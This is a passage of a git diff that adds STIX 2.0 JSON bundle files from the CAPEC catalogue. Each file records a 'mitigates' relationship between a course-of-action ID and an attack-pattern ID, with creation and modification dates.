"2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", + "target_ref": "attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--79de9748-e935-49a4-b7ed-2962df30e2f5.json b/capec/relationship/relationship--79de9748-e935-49a4-b7ed-2962df30e2f5.json new file mode 100644 index 0000000000..b982c552bf --- /dev/null +++ b/capec/relationship/relationship--79de9748-e935-49a4-b7ed-2962df30e2f5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9c560268-9d80-4823-b361-8a598a63ec56", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--79de9748-e935-49a4-b7ed-2962df30e2f5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--79faf469-f2d1-4818-ae18-9c928898c7da.json b/capec/relationship/relationship--79faf469-f2d1-4818-ae18-9c928898c7da.json new file mode 100644 index 0000000000..4d2e426021 --- /dev/null +++ b/capec/relationship/relationship--79faf469-f2d1-4818-ae18-9c928898c7da.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--09b87f2c-75c2-4890-8259-f78e0d03e991", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--79faf469-f2d1-4818-ae18-9c928898c7da", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f697f6c-8b52-40bb-8305-138fdf96c077", + "target_ref": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7a04dce2-d860-4de7-972d-835d61baed06.json b/capec/relationship/relationship--7a04dce2-d860-4de7-972d-835d61baed06.json new file mode 100644 index 0000000000..e88d2b04ed --- /dev/null +++ b/capec/relationship/relationship--7a04dce2-d860-4de7-972d-835d61baed06.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fc9698e9-94b3-44c2-b6ea-692f29886551", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7a04dce2-d860-4de7-972d-835d61baed06", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8765b029-9621-452e-9a68-6ea740a42ece", + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7a278d54-2787-42e3-9f18-7b64e39e6379.json b/capec/relationship/relationship--7a278d54-2787-42e3-9f18-7b64e39e6379.json new file mode 100644 index 0000000000..88c1626ee4 --- /dev/null +++ b/capec/relationship/relationship--7a278d54-2787-42e3-9f18-7b64e39e6379.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--878384c9-37c8-4a02-bcca-9d64e8f3235d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7a278d54-2787-42e3-9f18-7b64e39e6379", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7a5c3fcf-46fd-4fec-8a86-ab6f4e3d40f2.json b/capec/relationship/relationship--7a5c3fcf-46fd-4fec-8a86-ab6f4e3d40f2.json new file mode 100644 index 0000000000..de8ece851e --- /dev/null +++ b/capec/relationship/relationship--7a5c3fcf-46fd-4fec-8a86-ab6f4e3d40f2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3f4b7576-8be3-4989-85b0-dcc3896efdd3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7a5c3fcf-46fd-4fec-8a86-ab6f4e3d40f2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--083b142c-0281-4135-bf8d-cb4a55bda94e", + "target_ref": "attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7ad210dd-09f6-4e1b-b8a2-e3aa2417b539.json b/capec/relationship/relationship--7ad210dd-09f6-4e1b-b8a2-e3aa2417b539.json new file mode 100644 index 0000000000..1b7d73332b --- /dev/null +++ b/capec/relationship/relationship--7ad210dd-09f6-4e1b-b8a2-e3aa2417b539.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--42b3f822-422c-45f9-853f-3b444e828966", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7ad210dd-09f6-4e1b-b8a2-e3aa2417b539", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ac957d2-7012-4e03-af73-93bc0a24973d", + "target_ref": "attack-pattern--642de78e-0ded-49d0-bd92-b8b1f826f645", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7b2520de-2853-4624-ae3c-2068197b5783.json b/capec/relationship/relationship--7b2520de-2853-4624-ae3c-2068197b5783.json new file mode 100644 index 0000000000..79ee91b7e9 --- /dev/null +++ b/capec/relationship/relationship--7b2520de-2853-4624-ae3c-2068197b5783.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--31a9bc37-6786-4f2e-828a-2c961a4fc727", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7b2520de-2853-4624-ae3c-2068197b5783", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7b381f66-1024-42c8-8af0-527538460991.json b/capec/relationship/relationship--7b381f66-1024-42c8-8af0-527538460991.json new file mode 100644 index 0000000000..e02cfc85e3 --- /dev/null +++ b/capec/relationship/relationship--7b381f66-1024-42c8-8af0-527538460991.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5c8a6b95-c9b7-4478-b3f2-f678cc028bed", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7b381f66-1024-42c8-8af0-527538460991", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--750c8077-a3b7-4332-9fc6-a59435be6c57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7b385832-942e-4c6c-872f-557dc3452a35.json b/capec/relationship/relationship--7b385832-942e-4c6c-872f-557dc3452a35.json new file mode 100644 index 0000000000..d06ac0e076 --- /dev/null +++ b/capec/relationship/relationship--7b385832-942e-4c6c-872f-557dc3452a35.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--433e8c3f-686e-4493-9c56-6d22c172590b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7b385832-942e-4c6c-872f-557dc3452a35", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--76adf409-ce96-41bf-8ec8-bf4527b29b32", + "target_ref": "attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7b417e0b-dcbf-4266-b671-8b1a81d666b7.json b/capec/relationship/relationship--7b417e0b-dcbf-4266-b671-8b1a81d666b7.json new file mode 100644 index 0000000000..9e05429c18 --- /dev/null +++ b/capec/relationship/relationship--7b417e0b-dcbf-4266-b671-8b1a81d666b7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7867dcf1-8502-4795-b9ca-d4e2825c0b57", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7b417e0b-dcbf-4266-b671-8b1a81d666b7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--056c51b8-7dea-4fae-ba35-723377253083", + "target_ref": "attack-pattern--b20c5bf0-63ce-4908-996a-673a572420f8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7c2427c4-5e7c-48bc-b418-de45d3feb416.json b/capec/relationship/relationship--7c2427c4-5e7c-48bc-b418-de45d3feb416.json new file mode 100644 index 0000000000..252140f92f --- /dev/null +++ b/capec/relationship/relationship--7c2427c4-5e7c-48bc-b418-de45d3feb416.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a35d4191-f0b2-4f05-9165-bb9723f63eea", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7c2427c4-5e7c-48bc-b418-de45d3feb416", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d0336dc-c879-4610-bec0-033df2c9379a", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7c272f72-b4b5-498c-ac80-301414134dd5.json b/capec/relationship/relationship--7c272f72-b4b5-498c-ac80-301414134dd5.json new file mode 100644 index 0000000000..46e15c94c7 --- /dev/null +++ b/capec/relationship/relationship--7c272f72-b4b5-498c-ac80-301414134dd5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--564e6b9c-eed1-4ad0-8daa-865d77280c88", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7c272f72-b4b5-498c-ac80-301414134dd5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c9bdb74-17c0-4ad3-a2e5-343766003d65", + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7c55f273-53d1-4dfa-a48e-8e6d30245434.json b/capec/relationship/relationship--7c55f273-53d1-4dfa-a48e-8e6d30245434.json new file mode 100644 index 0000000000..63888bd509 --- /dev/null +++ b/capec/relationship/relationship--7c55f273-53d1-4dfa-a48e-8e6d30245434.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f9eac930-2f3a-4554-acab-5dfcb83e9fd6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7c55f273-53d1-4dfa-a48e-8e6d30245434", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2eb65f7c-003a-4479-b5f2-16f6e5794151", + "target_ref": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7cc4b914-4dc2-4b09-9a7f-87a392e99799.json b/capec/relationship/relationship--7cc4b914-4dc2-4b09-9a7f-87a392e99799.json new file mode 100644 index 0000000000..06dee02fd4 --- /dev/null +++ b/capec/relationship/relationship--7cc4b914-4dc2-4b09-9a7f-87a392e99799.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--db446857-17d5-4b5a-9579-2dd3a054a97b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7cc4b914-4dc2-4b09-9a7f-87a392e99799", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "target_ref": "attack-pattern--4447fce2-5d60-444e-bbf1-dfccd3db3cc9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7cf53966-8019-49f9-b7f3-5c084e4b9041.json b/capec/relationship/relationship--7cf53966-8019-49f9-b7f3-5c084e4b9041.json new file mode 100644 index 0000000000..dc194cce2f --- /dev/null +++ b/capec/relationship/relationship--7cf53966-8019-49f9-b7f3-5c084e4b9041.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--37c233ae-264b-4d4e-97c0-8a6d8ec96f1b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7cf53966-8019-49f9-b7f3-5c084e4b9041", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c72f403d-00e2-4d78-a821-4b3af3113b2d", + "target_ref": "attack-pattern--15c913ea-c4ac-48d3-9bbd-e1f0cf62bf87", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7cfaadf0-8cef-4fc6-948c-b787bc4de4bd.json b/capec/relationship/relationship--7cfaadf0-8cef-4fc6-948c-b787bc4de4bd.json new file mode 100644 index 0000000000..5f7f2d66ea --- /dev/null +++ b/capec/relationship/relationship--7cfaadf0-8cef-4fc6-948c-b787bc4de4bd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--815a9683-b1e2-49bb-affb-0c17e2dea504", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7cfaadf0-8cef-4fc6-948c-b787bc4de4bd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bece2ea-0104-4e65-ab99-86695150eed4", + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7d4c1719-841f-4bc3-a29a-f6774a701cd4.json b/capec/relationship/relationship--7d4c1719-841f-4bc3-a29a-f6774a701cd4.json new file mode 100644 index 0000000000..3cc39f614f --- /dev/null +++ b/capec/relationship/relationship--7d4c1719-841f-4bc3-a29a-f6774a701cd4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ea45ac61-5459-413b-b234-bffd9b64b34b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7d4c1719-841f-4bc3-a29a-f6774a701cd4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef8cf2b1-ae89-4ec8-a600-9a4f8fa9a090", + "target_ref": "attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7d63cc56-ed2c-4c5b-81c6-673180a95326.json b/capec/relationship/relationship--7d63cc56-ed2c-4c5b-81c6-673180a95326.json new file mode 100644 index 0000000000..00cd233d99 --- /dev/null +++ b/capec/relationship/relationship--7d63cc56-ed2c-4c5b-81c6-673180a95326.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1fc5d0f0-be4e-4d69-94d8-7e6ba8c96235", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7d63cc56-ed2c-4c5b-81c6-673180a95326", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--13d834cf-5ff3-49ae-9172-f9cbf8f6762f", + "target_ref": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7d81629d-bdda-4bc4-85b8-ea50eea6ee12.json b/capec/relationship/relationship--7d81629d-bdda-4bc4-85b8-ea50eea6ee12.json new file mode 100644 index 0000000000..883b5c2e39 --- /dev/null +++ b/capec/relationship/relationship--7d81629d-bdda-4bc4-85b8-ea50eea6ee12.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--214d8c77-bb28-4f88-a62e-40cf60c788da", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7d81629d-bdda-4bc4-85b8-ea50eea6ee12", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b6bea51f-2de9-4093-b738-636c45211da1", + "target_ref": "attack-pattern--3c8e5662-f840-45b4-944a-d2498837df44", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7da0fb75-3a9c-41b8-9e21-5ab6f33f492b.json b/capec/relationship/relationship--7da0fb75-3a9c-41b8-9e21-5ab6f33f492b.json new file mode 100644 index 0000000000..ad17b08f43 --- /dev/null +++ b/capec/relationship/relationship--7da0fb75-3a9c-41b8-9e21-5ab6f33f492b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--eef5c35b-3806-473f-b140-85c1b4b05bac", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7da0fb75-3a9c-41b8-9e21-5ab6f33f492b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7dc19342-6d0d-4069-8beb-bf6eebf70c6e.json b/capec/relationship/relationship--7dc19342-6d0d-4069-8beb-bf6eebf70c6e.json new file mode 100644 index 0000000000..a4a0dde97a --- /dev/null +++ b/capec/relationship/relationship--7dc19342-6d0d-4069-8beb-bf6eebf70c6e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ae03a4e8-1335-4440-a48e-a9e6030a171e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7dc19342-6d0d-4069-8beb-bf6eebf70c6e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08", + "target_ref": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7dc7508c-c157-4f37-8dce-a9e510510a67.json b/capec/relationship/relationship--7dc7508c-c157-4f37-8dce-a9e510510a67.json new file mode 100644 index 0000000000..eaf8cafe47 --- /dev/null +++ b/capec/relationship/relationship--7dc7508c-c157-4f37-8dce-a9e510510a67.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--82bac829-c37d-4c07-bc5e-49694da974e9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7dc7508c-c157-4f37-8dce-a9e510510a67", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7e1b0d46-4b00-4683-8ace-0e1259b91a53.json b/capec/relationship/relationship--7e1b0d46-4b00-4683-8ace-0e1259b91a53.json new file mode 100644 index 0000000000..df3e15c924 --- /dev/null +++ b/capec/relationship/relationship--7e1b0d46-4b00-4683-8ace-0e1259b91a53.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6841eab1-d613-44aa-b9d8-778dd5bdce7d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7e1b0d46-4b00-4683-8ace-0e1259b91a53", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7f68adb3-141f-4b73-ac2e-66f76711b5af", + "target_ref": "attack-pattern--1b1d3a84-d44b-4848-bb0a-e0fd7f1c05bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7ec0c832-fcae-437d-a36d-2c55aed229e0.json b/capec/relationship/relationship--7ec0c832-fcae-437d-a36d-2c55aed229e0.json new file mode 100644 index 0000000000..fc4d807d01 --- /dev/null +++ b/capec/relationship/relationship--7ec0c832-fcae-437d-a36d-2c55aed229e0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f54ac8ec-1b57-40d6-a42c-a27468ebd7e4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7ec0c832-fcae-437d-a36d-2c55aed229e0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301", + "target_ref": "attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7f31dd17-08ce-4ce9-a6ab-af300137930a.json b/capec/relationship/relationship--7f31dd17-08ce-4ce9-a6ab-af300137930a.json new file mode 100644 index 0000000000..f59ed39737 --- /dev/null +++ b/capec/relationship/relationship--7f31dd17-08ce-4ce9-a6ab-af300137930a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--eb7151a3-62eb-48a6-9aae-23e4e3ac4417", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7f31dd17-08ce-4ce9-a6ab-af300137930a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c5116127-47a4-45bb-82b5-941771ae2b72", + "target_ref": "attack-pattern--e2036f8f-24fd-4045-a3a6-f74bd0e5cc0f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7f33bb99-d999-44c2-a4eb-14c0c880d608.json b/capec/relationship/relationship--7f33bb99-d999-44c2-a4eb-14c0c880d608.json new file mode 100644 index 0000000000..0ba3a71879 --- /dev/null +++ b/capec/relationship/relationship--7f33bb99-d999-44c2-a4eb-14c0c880d608.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9cfee15e-01c3-4f77-81b3-bdf6c9851c0d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7f33bb99-d999-44c2-a4eb-14c0c880d608", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2734556b-0c47-4d4b-9c8e-e1e8fa98eb47", + "target_ref": "attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7f384ad7-e149-430e-a6cd-4166397caea2.json b/capec/relationship/relationship--7f384ad7-e149-430e-a6cd-4166397caea2.json new file mode 100644 index 0000000000..65c1c68791 --- /dev/null +++ b/capec/relationship/relationship--7f384ad7-e149-430e-a6cd-4166397caea2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e18f0cc2-d755-48d2-8c9b-3a14e9546646", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7f384ad7-e149-430e-a6cd-4166397caea2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--14767fc9-6805-46f8-b31b-17dbece67e4d", + "target_ref": "attack-pattern--fabe9a56-1333-417c-af2c-dc3ce7465a0c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--803bea86-c5c1-4b33-a008-37d45227bbc9.json b/capec/relationship/relationship--803bea86-c5c1-4b33-a008-37d45227bbc9.json new file mode 100644 index 0000000000..f0a6404726 --- /dev/null +++ b/capec/relationship/relationship--803bea86-c5c1-4b33-a008-37d45227bbc9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b6a7e415-6e9b-40e6-b587-1a3e6869f189", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--803bea86-c5c1-4b33-a008-37d45227bbc9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": 